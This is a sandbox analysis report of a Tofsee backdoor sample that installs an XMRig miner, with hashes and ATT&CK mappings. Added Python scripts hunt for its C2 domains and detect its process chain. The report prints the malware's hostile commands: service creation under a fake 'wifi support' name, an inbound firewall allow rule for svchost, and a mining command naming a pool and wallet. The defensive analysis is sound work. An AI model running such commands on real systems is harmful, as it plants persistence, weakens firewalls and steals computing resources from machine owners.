Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    11-12-2021 08:18

General

  • Target

    8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe

  • Size

    209KB

  • MD5

    cb2412d7c6cd6d8b942361f482655a4b

  • SHA1

    ce43dc2225354f5536b795ae307f1a7381c2e566

  • SHA256

    8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801

  • SHA512

    67332318a7eee352b1fe4fbe8455ac2841b233257103391b72fa6859affc724e9f8c508c055780e68c681567e74e104c572f2b90240c84000793a2c9f0244305

Malware Config

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Win32/Tofsee Connectivity Check M2
  • suricata: ET MALWARE Win32/Tofsee Connectivity Check M3
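The extracted config above names two C2 domains, and the two Suricata hits cover the bot's connectivity checks on the wire. The DNS side is the other place to look for the same infection, and the following is an added example for that (my code, not part of the sandbox report): it hunts DNS query logs for the config's C2 domains. The log lines are constructed, and their three-column layout (timestamp, client, query name) is an assumed simplification of a real DNS client event or Zeek dns.log record.

```python
"""Added example, not from the sandbox report: hunt DNS query logs for the
Tofsee C2 domains in the extracted config. Log lines are constructed; the
"timestamp client qname" layout is an assumed simplification."""

C2_DOMAINS = {"mubrikych.top", "oxxyfix.xyz"}   # from the report's Malware Config

# Constructed log lines. Lines 3 and 5 are deliberate near-misses that a
# substring match would flag; line 6 checks case and trailing-dot handling.
DNS_LOG = """\
2021-12-11T08:18:41Z 10.0.0.5 mubrikych.top
2021-12-11T08:18:42Z 10.0.0.5 www.oxxyfix.xyz
2021-12-11T08:18:43Z 10.0.0.7 notoxxyfix.xyz
2021-12-11T08:18:44Z 10.0.0.9 example.com
2021-12-11T08:18:45Z 10.0.0.7 oxxyfix.xyz.example.net
2021-12-11T08:18:46Z 10.0.0.9 MUBRIKYCH.TOP.
"""


def normalize(qname):
    """Lower-case and drop the trailing dot of an FQDN so comparisons are exact."""
    return qname.lower().rstrip(".")


def is_c2(qname, c2=C2_DOMAINS):
    """Exact match, or a subdomain of a C2 domain (suffix match on a label boundary)."""
    q = normalize(qname)
    return any(q == d or q.endswith("." + d) for d in c2)


def is_c2_substring(qname, c2=C2_DOMAINS):
    """The naive check, kept only to show what it over-matches."""
    q = normalize(qname)
    return any(d in q for d in c2)


def hunt(log_text, matcher=is_c2):
    """Return (client, qname) pairs for every query the matcher flags."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:          # skip blank or malformed lines
            continue
        _ts, client, qname = fields
        if matcher(qname):
            hits.append((client, normalize(qname)))
    return hits


if __name__ == "__main__":
    for client, name in hunt(DNS_LOG):
        print(f"{client} queried C2 domain {name}")
```

The point of the two matchers is the label-boundary check: `is_c2` flags `www.oxxyfix.xyz` and `MUBRIKYCH.TOP.` but not `notoxxyfix.xyz` or `oxxyfix.xyz.example.net`, while the substring version flags all four. Sandbox-extracted C2 lists are commonly pasted straight into a `contains` search, which is how the false positives get in.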

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature calls it likely ransomware behaviour; nothing else in this report (no file encryption, no ransom note) supports that reading here, and the observed payload is a Tofsee bot running an XMRig miner.

  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe
    "C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:400
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mflygwrk\
      2⤵
        PID:3684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wxxbyhzq.exe" C:\Windows\SysWOW64\mflygwrk\
        2⤵
          PID:360
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create mflygwrk binPath= "C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe /d\"C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2192
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description mflygwrk "wifi internet conection"
            2⤵
              PID:596
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start mflygwrk
              2⤵
                PID:3400
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:324
              • C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe
                C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe /d"C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3356
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1428
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1548
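The tree above is the whole persistence chain in order: create a new SysWOW64 subdirectory, move the dropped payload into it, register it as an auto-start service (`mflygwrk`, display name "wifi support") with the dropper's own path passed via `/d`, start it, add an inbound firewall allow rule for `svchost.exe`, then run the XMRig payload inside `svchost.exe` (the SetThreadContext and WriteProcessMemory signatures on PIDs 3356 and 1428 are consistent with process hollowing, and the command line on PID 1548 names the pool, wallet and `cn/half` algorithm). The following added example (my code, not part of the sandbox report) turns that chain into a detection over process-creation events. The event list is constructed from the report's command lines; the flat pid/ppid/image/cmdline schema is an assumed simplification of Sysmon Event ID 1, the parent PIDs are inferred from the tree's nesting, and parents the report does not show are set to 0.

```python
"""Added example, not part of the sandbox report: detect the service-install
and miner chain in the process tree above from process-creation events.
EVENTS is constructed from the report's command lines; the pid/ppid/image/
cmdline schema is an assumed simplification of Sysmon Event ID 1."""
import re

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe"
DROPPED = r"C:\Users\Admin\AppData\Local\Temp\wxxbyhzq.exe"
SVC_DIR = r"C:\Windows\SysWOW64\mflygwrk"
SVC_BIN = SVC_DIR + r"\wxxbyhzq.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
CMD, SC, NETSH = (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\sc.exe",
                  r"C:\Windows\System32\netsh.exe")
WOW = r"C:\Windows\SysWOW64"

# Constructed from the report's process tree; ppids follow the tree's nesting,
# parents the report does not show (the dropper, the SCM-started service) are 0.
EVENTS = [
    dict(pid=400, ppid=0, image=SAMPLE, cmdline=f'"{SAMPLE}"'),
    dict(pid=3684, ppid=400, image=WOW + r"\cmd.exe", cmdline=f'"{CMD}" /C mkdir {SVC_DIR}' + "\\"),
    dict(pid=360, ppid=400, image=WOW + r"\cmd.exe",
         cmdline=f'"{CMD}" /C move /Y "{DROPPED}" {SVC_DIR}' + "\\"),
    dict(pid=2192, ppid=400, image=WOW + r"\sc.exe",
         cmdline=rf'"{SC}" create mflygwrk binPath= "{SVC_BIN} /d\"{SAMPLE}\"" '
                 'type= own start= auto DisplayName= "wifi support"'),
    dict(pid=3400, ppid=400, image=WOW + r"\sc.exe", cmdline=f'"{SC}" start mflygwrk'),
    dict(pid=324, ppid=400, image=WOW + r"\netsh.exe",
         cmdline=f'"{NETSH}" advfirewall firewall add rule name="Host-process for services of '
                 f'Windows" dir=in action=allow program="{SVCHOST}" enable=yes>nul'),
    dict(pid=3356, ppid=0, image=SVC_BIN, cmdline=f'{SVC_BIN} /d"{SAMPLE}"'),
    dict(pid=1428, ppid=3356, image=SVCHOST, cmdline="svchost.exe"),
    dict(pid=1548, ppid=1428, image=SVCHOST,
         cmdline="svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6"
                 "NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half"),
]

# binPath is quoted inside sc's own quotes, so the inner quotes arrive as \" and
# the value is read with an escape-aware group.
SC_CREATE = re.compile(r'sc\.exe"?\s+create\s+(?P<name>\S+).*?binPath=\s*"(?P<bin>(?:[^"\\]|\\.)*)"', re.I)
DROPPER_ARG = re.compile(r'/d\\?"(?P<path>.+?)\\?"')          # the /d"<original exe>" argument
FW_ADD = re.compile(r'netsh(?:\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\s+(?P<args>.*)', re.I)
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')                   # netsh key=value / key="value"
MINER = re.compile(r'-o\s+(?P<pool>[\w.\-]+:\d+)\b.*?-u\s+(?P<wallet>\S+)')   # stratum-style args
SYSWOW_SUBDIR = re.compile(r'^[a-z]:\\windows\\syswow64\\[^\\]+\\[^\\]+\.exe$', re.I)


def analyze(events):
    """Return finding dicts; each carries a 'type' plus the fields pulled from the command line."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        cmd, image = e["cmdline"], e["image"].lower()
        m = SC_CREATE.search(cmd)
        if m:
            binary = m["bin"].split()[0]        # assumes an unquoted, space-free service path
            d = DROPPER_ARG.search(m["bin"])
            findings.append(dict(type="service_install", pid=e["pid"], service=m["name"],
                                 binary=binary, syswow64_subdir=bool(SYSWOW_SUBDIR.match(binary)),
                                 dropper=d["path"] if d else None))
        m = FW_ADD.search(cmd)
        if m:
            kv = {k.lower(): q or u for k, q, u in KV.findall(m["args"])}
            if kv.get("action", "").lower() == "allow" and kv.get("program", "").lower().endswith("\\svchost.exe"):
                findings.append(dict(type="firewall_allow_svchost", pid=e["pid"],
                                     rule=kv.get("name"), program=kv["program"]))
        if image.endswith("\\svchost.exe"):
            parent = by_pid.get(e["ppid"])
            parent_image = parent["image"] if parent else None
            if not (parent_image or "").lower().endswith("\\services.exe"):
                f = dict(type="svchost_odd_parent", pid=e["pid"], parent=parent_image)
                mm = MINER.search(cmd)
                if mm:
                    f.update(type="svchost_miner_args", pool=mm["pool"], wallet=mm["wallet"])
                findings.append(f)
    return findings


def chain_detected(findings):
    """True when a service in a SysWOW64 subdir, a firewall allow for svchost and a miner all appear."""
    types = {f["type"] for f in findings}
    odd_service = any(f["type"] == "service_install" and f["syswow64_subdir"] for f in findings)
    return odd_service and {"firewall_allow_svchost", "svchost_miner_args"} <= types


def extract_iocs(findings):
    """Collect the host-side indicators worth blocking or hunting from the findings."""
    iocs = {}
    for f in findings:
        if f["type"] == "service_install":
            iocs.update(service=f["service"], binary=f["binary"], dropper=f["dropper"])
        elif f["type"] == "svchost_miner_args":
            iocs.update(pool=f["pool"], wallet=f["wallet"])
    return iocs


if __name__ == "__main__":
    found = analyze(EVENTS)
    for f in found:
        print(f)
    print("chain detected:", chain_detected(found), extract_iocs(found))
```

Two details of the observed lines matter for anyone writing a signature from them. The `>nul` at the end of the netsh command line is part of the argument string the sandbox recorded (netsh was invoked directly, with no cmd.exe to treat it as a redirect), so a rule that matches the full line should keep it. And `svchost.exe` reached here with a parent of `wxxbyhzq.exe`, then of another `svchost.exe`, where a genuine service host has `services.exe` as its parent; that parent check alone, without the miner arguments, already fires on PID 1428.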

              Network

              MITRE ATT&CK Matrix (ATT&CK v6; the number after each technique is the count of matching signatures)

              Persistence
                • New Service (T1050): 1
                • Modify Existing Service (T1031): 1
                • Registry Run Keys / Startup Folder (T1060): 1

              Privilege Escalation
                • New Service (T1050): 1

              Defense Evasion
                • Disabling Security Tools (T1089): 1
                • Modify Registry (T1112): 2

              Discovery
                • System Information Discovery (T1082): 1


              Downloads

              • C:\Users\Admin\AppData\Local\Temp\wxxbyhzq.exe
                MD5

                4ac8bab1568c5b71fa307242f0240773

                SHA1

                316bc8b3204e3183b04916567952096ea879346c

                SHA256

                b4346ad490192632319eb83559f159e180c17834e1e966352efcdd9ff98fe44b

                SHA512

                7811200b349084fd1125f37edc6399152e897609769c64dfba1c578a41f867b567cadd2e72245b9415d2cb5419a5ddd1db09a75df9ac8c31daf16c7f9d99edac

              • C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe
                MD5

                4ac8bab1568c5b71fa307242f0240773

                SHA1

                316bc8b3204e3183b04916567952096ea879346c

                SHA256

                b4346ad490192632319eb83559f159e180c17834e1e966352efcdd9ff98fe44b

                SHA512

                7811200b349084fd1125f37edc6399152e897609769c64dfba1c578a41f867b567cadd2e72245b9415d2cb5419a5ddd1db09a75df9ac8c31daf16c7f9d99edac

              • memory/324-125-0x0000000000000000-mapping.dmp
              • memory/360-119-0x0000000000000000-mapping.dmp
              • memory/400-116-0x00000000001D0000-0x00000000001E3000-memory.dmp
                Filesize

                76KB

              • memory/400-117-0x0000000000400000-0x0000000000825000-memory.dmp
                Filesize

                4.1MB

              • memory/400-115-0x00000000001C0000-0x00000000001CD000-memory.dmp
                Filesize

                52KB

              • memory/596-122-0x0000000000000000-mapping.dmp
              • memory/1428-126-0x0000000002900000-0x0000000002915000-memory.dmp
                Filesize

                84KB

              • memory/1428-127-0x0000000002909A6B-mapping.dmp
              • memory/1428-128-0x0000000000800000-0x0000000000801000-memory.dmp
                Filesize

                4KB

              • memory/1428-129-0x0000000000800000-0x0000000000801000-memory.dmp
                Filesize

                4KB

              • memory/1428-131-0x0000000002900000-0x0000000002915000-memory.dmp
                Filesize

                84KB

              • memory/1548-132-0x0000000002890000-0x0000000002981000-memory.dmp
                Filesize

                964KB

              • memory/1548-136-0x000000000292259C-mapping.dmp
              • memory/1548-137-0x0000000002890000-0x0000000002981000-memory.dmp
                Filesize

                964KB

              • memory/2192-121-0x0000000000000000-mapping.dmp
              • memory/3356-130-0x0000000000400000-0x0000000000825000-memory.dmp
                Filesize

                4.1MB

              • memory/3400-123-0x0000000000000000-mapping.dmp
              • memory/3684-118-0x0000000000000000-mapping.dmp